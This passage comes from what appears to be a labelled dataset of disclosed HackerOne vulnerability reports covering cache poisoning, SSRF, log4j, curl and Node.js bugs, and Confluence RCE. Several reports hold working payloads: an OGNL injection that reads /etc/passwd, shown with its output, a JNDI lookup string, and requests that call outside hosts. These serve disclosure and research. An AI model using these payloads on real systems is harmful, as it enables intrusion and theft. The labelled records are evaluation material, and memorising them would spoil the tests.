Scripting (XSS) - Stored] Cache Poisoning allows redirection on JS files\n\nHi,\n\nI found the following Cache Poisoning vulnerability:\n\n1. Send the following request: ( this will poison `/test.js` into redirecting to `https://youst.in/test.js`) \n\n```http\nGET /test.js?cb=1 HTTP/2\nHost: design.glassdoor.com\nSec-Ch-Ua: \"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36\nSec-Ch-Ua-Platform: \"macOS\"\nAccept: text/css,*/*;q=0.1\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: no-cors\nSec-Fetch-Dest: style\nReferer: https://design.glassdoor.com/\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nX-Forwarded-Scheme: http\nX-Forwarded-Host: youst.in\n\n```\n\n2. You should notice the `Cf-Cache-Status: MISS` header when first sending the request. After sending another request, you should see `Cf-Cache-Status: HIT`, confirming the redirect has been cached.\n\n3. You can also visit the url in a browser and notice you get redirect to `youst.in`.\n\n## Impact\n\nAn attacker can use the same attack against valid JS files leading to full control over the loaded JS. If any Glassdoor websites import javascript files from `https://design.glassdoor.com/*` they are susceptible to a Stored XSS attack via Cache Poisoning.", "source": "hackerone", "timestamp": "2023-08-24", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "ced4695ce3cd956062d5", "text": "[Path Traversal] [CVE-2020-3452] on ███████\n\nThe following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower.\n\n# URL:\nhttps://████/\n\n# Vulnerable URL:\nhttps://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n██████████\n\n# Resources:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThe vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n* Go to https://██████/+CSCOE+/logon.html\n* Intercept the request with Burpsuite\n* Send the request to Repeater\n* Change the URL path to the following `/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../as` an example to read \"/+CSCOE+/portal_inc.lua\" file.\n* You will get the portal_inc.lua file\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "3729708a8fa739738f41", "text": "[Business Logic Errors] CVE-2022-32207: Unpreserved file permissions\n\n## Summary:\nCurl fails to preserve file permissions when writing:\n- `CURLOPT_COOKIEJAR` database\n- `CURLOPT_ALTSVC` database\n- `CURLOPT_HSTS` database\n\nInstead the permissions is always reset to 0666 & ~umask if the file is updated.\n\nAs a result a file that was before protected against read access by other users becomes other user readable (as long as umask doesn't have bit 2 set).\nOut of these files only the `CURLOPT_COOKIEJAR` is likely to contain sensitive information.\n\nIn addition curl will replace softlink to the database with locally written database, or if the application is run privileged, specifying `\"/dev/null\"` as a file name can lead to system overwriting the special file and result in inoperable system.\n\nThis is CWE-281: Improper Preservation of Permissions\n\n## Steps To Reproduce:\n\n 1. `umask 022`\n 2. `install -m 600 /dev/null cookie.db`\n 3. `curl -b cookie.db -c cookie.db https://google.com`\n 4. `ls -l cookie.db`\n\nAt least for `CURLOPT_COOKIEJAR` this vulnerability was introduced in https://github.com/curl/curl/commit/b834890a3fa3f525cd8ef4e99554cdb4558d7e1b - this change was introduced to fix a issue https://github.com/curl/curl/issues/4914\n\n## Fix recommendations\n\nIf a file file is created and moved over a the old one, only do this if the file is regular file. Anything else is likely going to end up causing unexpected behaviour, outright failing, or if the user has high enough permissions, damage to the operating system.\n\nSafe cloning of file permissions can only be achieved if the owner / group of the file match the current user (else group permissions might be incorrect). Hence creating a new file and moving it over the old one should IMO only be attempted if the file user and group match that of the previous file.\n\nIf a method of creating a new file is still desired, something like this could be attempted to cover the most use cases:\n\n ```\n /* If old file is a regular file attempt creating a new file with same ownership */\n struct stat st;\n if (stat(filename, &st) != -1 && S_ISREG(st.st_mode)) {\n FILE *file;\n int fd;\n struct stat nst;\n fd = open(tempstore, O_CREAT | O_EXCL, 0700);\n if (fd == -1)\n goto fail;\n if (fstat(fd, &nst) == -1 ||\n nst.st_uid != st.st_uid || nst.st_gid != st.st_gid) {\n /* newly created file doesn't have same ownership, we can't proceed safely */\n close(fd);\n unlink(tempstore);\n goto fail; // or perhaps try direct write instead?\n }\n /* use same mode as old file */\n if (fchmod(fd, st.st_mode) == -1) {\n close(fd);\n unlink(tempstore);\n goto fail;\n }\n file = fdopen(fd, FOPEN_WRITETEXT);\n if (!file) {\n close(fd);\n unlink(tempstore);\n goto fail;\n }\n /* write to file */\n /* if successful move file over filename etc */\n }\n else  {\n /* use direct file write */\n }\n ```\n\n## Impact\n\nLeak of sensitive information", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "9297f54bbdd5b86e1b0d", "text": "[Cross-site Scripting (XSS) - Reflected] RXSS on █████████\n\nI found RXSS on https://███████/██████\n\n## Impact\n\nPerform any action within the application that the user can perform.\nView any information that the user is able to view.\nModify any information that the user is able to modify.\nInitiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nInject payload `r={payload}`\n\n1. Copy and paste on Burpsuite Repeater:\n```\nPOST /███ HTTP/1.1\nHost: ████████\nCookie: CFID=26233; CFTOKEN=90ba2403db7cf6d0-EA17C9CD-25F4-FB4C-2DEC8DEF637D9544; JSESSIONID=4837C2581F93ABB4DC8F719B2881FA98.cfusion; USAASCpersistence=184943114.20480.0000; TS0102adba=01dbba97f7cb238df71647f1b721444c13c907477d6bbbdab26080274d698141cbde7445d9eac690029443ecf71a098be9ddf1b4285cb4c9fdec0c2d52e8c64f27a783caa91d63c57bc0492f850ce173197907096e69fb1671e87db9318cbbea85dad29ef8ff28ef59a7467ca3f87758b8d9f1ce8c\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 63\nOrigin: https://██████████\nReferer: https://████████/███████\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nTe: trailers\nConnection: close\n\nr=%22>&btnAction=I+understand+and+accept\n```\n2. View the result:\n███████\n████████\n\n3. You can use this code to test on html files :\n```\n\n \n \n
    \n \n \n \n
    \n \n\n\n```\n\n## Suggested Mitigation/Remediation Actions\nFilter input on arrival\nEncode data on output\nUse appropriate response headers\nContent Security Policy.", "source": "hackerone", "timestamp": "2022-06-10", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "169094cd0ee1e802d655", "text": "[Server-Side Request Forgery (SSRF)] CVE-2022-27780: percent-encoded path separator in URL host\n\n## Summary:\nURL decoding the entire proxy string could lead to SSRF filter bypasses. For example,\n\nWhen the following curl specifies the proxy string `http://example.com%2F127.0.0.1`\n\n- If curl URL parser or another RFC3986 compliant parser parses the initial string http://127.0.0.1%2F.example.com, it will derive 127.0.0.1%2Fexample.com or 127.0.0.1/example.com as the host, if for instance, an SSRF check is used to determine if a host ends with .example.com (.example.com being a allow-listed domain), the check will succeed.\n- curl will then URL decode the entire proxy string to http://127.0.0.1/example.com and send it to the server\n````\nGET http://127.0.0.1/example.com HTTP/1.1\nHost: 127.0.0.1/example.com\nUser-Agent: curl/7.83.0\nAccept: */*\nProxy-Connection: Keep-Alive\n````\n- This proxy string is valid, and proxy servers, even RFC3986-compliant ones will send the request to the host 127.0.0.1\n\n## Steps To Reproduce:\nI switched things up and used 127.0.0.1 as the allow-listed server and example.com as the target server to make it easier (no need to setup a HTTP server) to reproduce.\n\n1. I used https://github.com/abhinavsingh/proxy.py as my proxy server. \n2. Perform the following:\n````\ncurl -x http://127.0.0.1:8899 http://example.com%2F127.0.0.1\n````\n3. You will receive a malformed response \n````\n\n\n\n \n 400 - Bad Request\n \n \n

    400 - Bad Request

    \n \n\n````\nHowever, this response is actually being returned by example.com, the reason is that proxy.py will forward the Host header, currently 127.0.0.1/example.com curl sends it, making it a Blind SSRF\n\n4. If \n- an attacker can control the host header either via curl itself \n- the proxy does not forward the host header curl sends, \n- or if servers which ignore the Host header entirely such as Express is used,\nit is possible to read the full response\n````\ncurl -x http://127.0.0.1:8899 -H \"Host: example.com\" http://example.com%2F127.0.0.1/%2e%2e/\n````\n## Recommended Fix:\nThe recommended fix for this is to not URL decode the host component of the proxy string when passing to proxy server.\n\n## Impact\n\nSSRF filter bypass at if the curl URL parser or a RFC 3986 parser is used, it could lead to blind / full SSRF depending on the proxy used.", "source": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "61ae1b8d5b80c3b47531", "text": "[Weak Password Recovery Mechanism for Forgotten Password] No length on password\n\nHey, when I try to set the password while creating an account I noticed that you haven't kept any password limit. \n\nYou need to decrease password length: There are two reasons for limiting the password size. For one, hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target for a Denial Of Service attack.\n\nNormally all sites have a password minimum to maximum lengths like 72 characters limit or 48 limits to prevent Denial Of Service attack. in my SQL but in the website registration page, there are no limitations. Let me know if you need any more details.\n\nVulnerable Domain:https://imgur.com/\n==========\n\nThis is typically not DoS, but a vulnerability that may lead to a DoS attack.\n\nThe password I tried is:\n\nT12345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678912345678", "source": "hackerone", "timestamp": "2022-01-24", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "1a42e6d3177c0d936de9", "text": "[HTTP Request Smuggling] CVE-2022-32213 bypass via obs-fold mechanic\n\n## Summary\nThe fix for CVE-2022-32213 can be bypass using an obs-fold, which Node's http parser supports\n\n## Proof-Of-Concept\n`````\nconst http = require('http');\n\nhttp.createServer((request, response) => {\n let body = [];\n request.on('error', (err) => {\n response.end(\"error while reading body: \" + err)\n}).on('data', (chunk) => {\n body.push(chunk);\n}).on('end', () => {\n body = Buffer.concat(body).toString();\n\n response.on('error', (err) => {\n response.end(\"error while sending response: \" + err)\n });\n\n response.end(\"Headers: \" + JSON.stringify(request.headers));\n });\n}).listen(5000);\n\n`````\nSend the obs-fold via curl\n`````\ncurl -vv -H $'Transfer-Encoding: chunked\\r\\n abc' --data \"A\" http://127.0.0.1:5000\n`````\nSee that the server accepted the chunked request, and will incorrectly fold abc to the value of the Transfer-Encoding header. This is seen in the value of \"transfer-encoding\" as \"chunked abc\" in the printed headers.\n`````\nHeaders: {\"host\":\"127.0.0.1:5000\",\"user-agent\":\"curl/7.83.1\",\"accept\":\"*/*\",\"transfer-encoding\":\"chunked abc\",\"content-type\":\"application/x-www-form-urlencoded\"}\n`````\n\n## Impact\n\nIf nodejs HTTP module is used as a proxy, then it incorrectly parses the transfer-encoding header as indicative of chunked request, while folding the headers and hence forwarding `Transfer-Encoding: chunked abc` which is not a valid transfer-encoding header to the downstream server. As such this can lead to the HTTP request smuggling as indicated by CVE-2022-32213.", "source": "hackerone", "timestamp": "2022-10-26", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "9a309ad2969b826d0fbd", "text": "[Open Redirect] CVE-2022-45402: Apache Airflow: Open redirect during login\n\nIn Apache Airflow versions prior to 2.4.3, there was an open redirect in the webserver's `/login` endpoint.\n\nmy initial email to `security@apache.org`:\n```\nHi,\n\nIn Apache Airflow, there is a parameter \"next\" on the Login page. And after a successful login, we're redirected to this parameter's value. \nI see there are some preventions for the open redirect bug. However, I can bypass these preventions using \"/\\google.com\"\n\nIt seems this parameter accepts anything after the slash \"/\" character. And, browsers parse \"/\\\" as \"http://\" in the location header.\n\nFor reproducing, you can try to login on the http://127.0.0.1:8080/login/?next=/\\google.com\n\nI tested this bug in the last version (v2.4.2)\n\nRegards,\nBugra Eskici\n```\n\nHere is the email thread:\n{█████████}\n\n## Impact\n\nUnvalidated URL redirection during login, can be used for phishing, etc.\n\nRegards,\nBugra", "source": "hackerone", "timestamp": "2022-12-01", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "1ca47be7c6a67be19ded", "text": "[Server-Side Request Forgery (SSRF)] SSRF due to CVE-2021-27905 in www.████████\n\nApache Solr is vulnerable to SSRF using the parameter \"masterUrl\". This issue is registered as [CVE-2021-27905](https://nvd.nist.gov/vuln/detail/CVE-2021-27905).\n\n## Impact\n\nA successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform [arbitrary command execution](https://portswigger.net/web-security/os-command-injection).\n\nAn SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application, leading to potential legal liabilities and reputational damage.\n\n \n### Supporting Material/References\n\nhttps://portswigger.net/web-security/ssrf\nhttps://www.anquanke.com/post/id/238201\n\n## System Host(s)\nwww.██████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-27905\n\n## Steps to Reproduce\n## Steps To Reproduce\n\nFirst wee need to send this GET request\n```\nGET /solr/admin/cores?wt=json HTTP/1.1\nHost: www.███\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\nAccept-Language: en\nConnection: close\nAccept-Encoding: gzip\n\n```\nResponse\n```\nHTTP/1.1 200 OK\nConnection: close\nContent-Length: 1002\nCache-Control: max-age=2592000\nContent-Type: text/plain;charset=UTF-8\nDate: Tue, 04 May 2021 05:13:17 GMT\nServer: Microsoft-IIS/7.5\nX-Powered-By: ARR/2.5\nX-Powered-By: ASP.NET\n\n████\n```\nNow we can do a HTTP request to the target we want to test it on. I'll be using Burp Collaborator, to test it yourself, please replace the value accordingly.\n\nRequest \n```\nGET █████████masterUrl=http://6pwo0p85qh07drdgdlr9nr9hn8tyhn.burpcollaborator.net HTTP/1.1\nHost: www.███\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\nAccept-Language: en\nConnection: close\nAccept-Encoding: gzip\n\n``` \n\nResponse\n```\nHTTP/1.1 200 OK\nConnection: close\nContent-Length: 174\nCache-Control: no-cache, no-store\nContent-Type: text/xml;charset=UTF-8\nDate: Tue, 04 May 2021 05:13:19 GMT\nEtag: \"17935cb837f\"\nExpires: Sat, 01 Jan 2000 01:00:00 GMT\nLast-Modified: Tue, 04 May 2021 05:13:20 GMT\nPragma: no-cache\nServer: Microsoft-IIS/7.5\nSet-Cookie: ARRAffinity=450f2c90c5749e5ead79f5f3389d0369674c71e046ba20f5151e80e68da4c908;Path=/;Domain=www.██████\nX-Powered-By: ARR/2.5\nX-Powered-By: ASP.NET\n\n\n\n00OK\n\n\n```\nAnd in Burp's collaborator we receive a HTTP request from the server:\n█████\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "ed8b88e03f8841dba769", "text": "[Improper Input Validation] CVE-2023-28710 Apache Airflow Spark Provider Arbitrary File Read via JDBC\n\nIn all versions of Apache Airflow Spark Provider (the verification version is 4.0.0), because the parameters are not effectively filtered, the attacker can pass in malicious schema parameters (including malicious JDBC url) when establishing a connection with SparkJDBCHook, so that when establishing When connecting, a malicious mysql server can read any file on airflow.\n\nthis is screenshot of email and ASF response email I submitted\n\n████████████████\n\n## Impact\n\nWhen airflow does not enable authentication, the attacker can modify the existing connection configuration information, so that the DAG that uses SparkJDBCOperator in the system is running and connected to a malicious mysql server (or other types of servers), and is read by the attacker on the system , and more seriously, attackers can send malicious serialized data, which eventually leads to remote code execution.\n\nThis deserialization command was not successfully verified because the version of apache-common-collections-3.2.2 used by pyspark is too high, but when the jdk version used by the target system is 7u21 or there are other exploit chains, it can Causes the deserialization command to execute", "source": "hackerone", "timestamp": "2023-07-12", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "b01a42a2e827777c144d", "text": "[Unknown] Java: An experimental query for ignored hostname verification\n\nThis bug was reported directly to GitHub Security Lab.", "source": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "b20dfd2fefc2b1404e75", "text": "[Information Disclosure] [h1-2102] shopApps query from the graphql at /users/api returns all existing created apps, including private ones\n\n## Summary:\nI have seen that there is query called shopApps executable on the `/[ID]/users/api` graphql that returns a huge amount of apps (it timeouts with a limiting). In the response I have noticed the returned apps also include the private apps, so I do not think that this is intented like this. Using this method, one can grab all the apps, including private ones from shopify.\n\n## Steps To Reproduce:\n1. Login to shopify.plus as the admin\n2. Go to users, monitor the request and send the POST made to `/[ID]/users/api` to repeater\n3. Change the body with this one :\n\n```\n{\"query\":\"query xxx { shopApps(first:10000) { edges { node { id isPrivate handle name title shopifyApiClientId } } } }\"}\n```\n\nIn the response, if you search for `\"isPrivate\":true` you will see also private apps.\n\n## Supporting Material/References:\nScreenshots attached\n\n## Impact\n\nOne can grab all the shopify apps, including the private ones that I assume are not meant to be accessible.", "source": "hackerone", "timestamp": "2022-07-15", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "4aeb8334818a3bf55cda", "text": "[Unknown] (CVE-2023-32006) Permissions policies can impersonate other modules in using module.constructor.createRequire()\n\nhttps://nodejs.org/en/blog/vulnerability/august-2023-security-releases#permissions-policies-can-impersonate-other-modules-in-using-moduleconstructorcreaterequire-mediumcve-2023-32006\n\nhttps://hackerone.com/reports/2043807\n\nPatch was provided about maintainer opted for different approach.\n\n## Impact\n\nsee reports", "source": "hackerone", "timestamp": "2023-10-08", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "12868739ff61a14637fd", "text": "[Information Disclosure] Exposed .bash_history at http://21days2017.mtncameroon.net/.bash_history\n\n## Summary:\nDear Security Team,\n\nI found some dangerous urls on your servers that reveal important informations about the servers configuration themself and that are very interesting from a hacker point of view.\n\n## Steps To Reproduce:\nhttp://21days2017.mtncameroon.net/.bash_history\n\n##Remediation\n\n* disable that kind of function on production server\n* protect them with strong credentials\n* use ip restriction\n\nBest regards,\nVishu10x00 ❤️\n\n## Impact\n\nWhile this does not represent a real security issue, this reveal important informations about your system and could be used by a malicious user for a future attack.", "source": "hackerone", "timestamp": "2022-03-20", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "de32c8d6282788291f6e", "text": "[Use of Externally-Controlled Format String] ███ ████████ running a vulnerable log4j\n\n#Report\n\n**Description:**\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228\n\n## Impact\n\nProbably arbitrary code execution\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2021-44228\n\n## Steps to Reproduce\n1. Browse to https://██████████/█████████https%3A%2F%2F███%2F\n2. Enter a `${jndi:ldap://dns-server-yoi-control/a}` into the username field\n3. Enter a random password\n4. Submit\n\nObserve that a request was made to your DNS server. This strongly suggests a vulnerable log4j.\n\n## Suggested Mitigation/Remediation Actions\nUpdate log4j or disable jndi support.\n\n\n\n#Activity Timeline\n\n2021-12-10 18:16 (-0600) (comment)\nGreetings from the Department of Defense (DoD),\n\nThank you for supporting the DoD Vulnerability Disclosure Program (VDP).\n\nBy submitting this report, you acknowledge understanding of, and agreement to, the DoD Vulnerability Disclosure Policy as detailed at @DeptofDefense.\n\nThe VDP Team will review your report to ensure compliance with the DoD Vulnerability Disclosure Policy. If your report is determined to be out-of-scope, it will be closed without action.\n\nWe will attempt to validate in-scope vulnerability reports and may request additional information from you if necessary. We will forward reports with validated vulnerabilities to DoD system owners for their action.\n\nOur goal is to provide you with status updates not less than every two weeks until the reported vulnerability is resolved.\n\nRegards,\n\nThe VDP Team\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (report severity updated)\nnull\n\n---\n\n2021-12-13 08:29 (-0600): @agent-l8 (bug triaged)\nGreetings,\n\nWe have validated the vulnerability you reported and are preparing to forward this report to the affected DoD system owner for resolution.\n\nThank you for bringing this vulnerability to our attention!\n\nWe will endeavor to answer any questions the system owners may have regarding this report; however, there is a possibility we will need to contact you if they require more information to resolve the vulnerability.\n\nYou will receive another status update after we have confirmed your report has been resolved by the system owner. If you have any questions, please let me know.\n\nThanks again for supporting the DoD Vulnerability Disclosure Program.\n\nRegards,\n\nThe VDP Team\n\n---", "source": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "within_source_cve_index", "label": 1} -{"id": "c31f27813692fb79e58f", "text": "[Violation of Secure Design Principles] Found Origin IP's Lead To Access ████\n\nDiscovered that the ██████ site exposed its Non-Cloudflare IP which could allow bypassing of anti-DDoS mechanisms.\nYour origin servers are not blocking access from non-Cloudflare servers.This way crawlers can find your origin servers' IPs by checking random IPs until they found your origin server(s).\nWhat makes this especially easy are tools like shodan.io(which can find your origin servers).\n\n## Impact\n\nThis attack vector can be extremely bad because with the IP found out an attacker could attack the servers by DDoS or other attacks without being stopped by CloudFlare.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nVisit these link:\nhttps://www.shodan.io/search?query=hostname%3A████+200\n\nIP:\n-███\n\n## Suggested Mitigation/Remediation Actions", "source": "hackerone", "timestamp": "2022-10-14", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "d550a260ae9a826c611f", "text": "[Cross-Site Request Forgery (CSRF)] CSRF with logout action\n\nHi, I wanted let you know and saw that previously similar issue was fixed.\nRepro steps: Go to https://weblate.org/pl/ and click top right icon for logging in (user-tab user-anonymous, https://weblate.org/saml2/login/?next=/pl/).\nLog in using username and password (https://hosted.weblate.org/accounts/login/?next=/idp/login/process/). \nLogged in on site https://weblate.org/pl/ use link: https://weblate.org/logout/\nSee logged out.\n\nThe similar result with using external page with prepared CSRF payload like:\n` Click me to see bonus pack`\nHere as logged in user use this link from external page, next go to tab where logged in and refresh the page - see logged out there too.\n\nBest regards,\n\n## Impact\n\nBad actor can affect the user's login status - logged out.", "source": "hackerone", "timestamp": "2023-06-16", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "a01dae5dde965894f329", "text": "[Privilege Escalation] Context isolation bypass via nested unserializable return value\n\nThis issue is exploitable under either of two conditions:\n\n* If an API exposed to the main world via contextBridge can return an object or array that contains a JS object which cannot be serialized, for instance, a canvas rendering context. This would normally result in an exception being thrown `Error: object could not be cloned`.\n* If an API exposed to the main world via contextBridge has a return value that throws a user-generated exception while being sent over the bridge, for instance a dynamic getter property on an object that throws an error when being computed.\n\nIn both of these cases the context that receives the exception may be able to (via the exception) obtain privileged access to the context on the other side of the bridge.\n\n## Impact\n\nThis is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.", "source": "hackerone", "timestamp": "2023-10-07", "split": "val", "label_source": "within_source_cve_index", "label": 0} -{"id": "df2337248408395b1c7a", "text": "[OS Command Injection] RCE on ███████ [CVE-2021-26084]\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\nCVE-2021-26084\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nPOST\n(command cat /etc/passwd)\n```\nPOST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1\nHost: ███\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 915\n\nqueryString=aaaaaaaa\\u0027%2b{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var+isWin+%3d+java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022)%3b+var+cmd+%3d+new+java.lang.String(\\u0022cat /etc/passwd\\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\\u0022cmd.exe\\u0022,+\\u0022/c\\u0022,+cmd)%3b+}+else{p.command(\\u0022bash\\u0022,+\\u0022-c\\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\\u0022\\u0022%3b+var+output+%3d+\\u0022\\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\\u0027)}%2b\\u0027\n\n```\n\nYou will see the output of the ifconfig command\n\nOUTPUT\n```\n type=\"hidden\"\n name=\"queryString\" value=\"aaaaaaaa[root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nconfluence:x:2002:2002::/var/atlassian/application-data/confluence:/bin/bash\n]\" />\n Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links\n\nwas [closed as _Resolved _ about six months ago](https://hackerone.com/reports/1032610#activity-12095285).\n\nHowever, a regression on the fix for the vulnerability in question seems to have occurred, and the bug is reproducible with the exact same payload.\n\n## Impact\n\nRefer to [#1032610](https://hackerone.com/reports/1032610#user-content-impact).", "source": "hackerone", "timestamp": "2022-12-12", "split": "val", "label_source": 